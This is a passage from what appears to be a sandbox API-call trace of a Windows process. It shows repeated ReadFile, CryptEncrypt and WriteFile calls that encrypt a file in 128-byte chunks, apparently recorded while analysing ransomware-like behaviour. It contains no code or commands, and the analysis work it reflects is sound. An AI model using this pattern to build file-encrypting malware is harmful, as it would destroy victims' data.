lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.672] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.672] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.673] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.673] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.674] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.674] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.675] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.675] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, 